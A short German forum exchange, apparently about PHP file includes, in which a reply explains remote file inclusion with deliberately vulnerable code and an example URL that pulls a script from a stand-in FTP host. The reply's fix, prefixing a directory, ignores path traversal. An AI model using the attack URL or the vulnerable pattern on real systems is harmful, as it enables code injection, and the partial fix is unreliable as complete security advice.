Hi,

ich habe meinetwegen einen ordner inc/ darin meine inc.php´s nun prüfe ich file_exists("blabla/inc/datei.inc.php") wie kann sich da noch ein anderes file reinschummeln???

solange du gezielt *in diesem Verzeichnis* nach der gefragten Datei suchst, ist ja alles in Ordnung. Falls du aber eine Konstruktion in der Art hast:

$includefile = $_GET['page'];
 if (file_exists($includefile))
    include $includefile;

dann kann jemand über

http://www.example.org/?page=ftp://meinftp.test/meinscript.php

seinen eigenen Code bei dir einschleusen. Sobald du aber bei file_exists() selbst noch ein Verzeichnis voranstellst, etwa file_exists("./inc/".$includefile), dann bist du relativ sicher. Denn wenn jetzt jemand einen kompletten Pfad einschleust, wie ich es eben skizziert habe, ergibt das innerhalb von file_exists() einen ungültigen Pfad, und da kann nichts passieren.
Jetzt verständlicher?

Ciao,
 Martin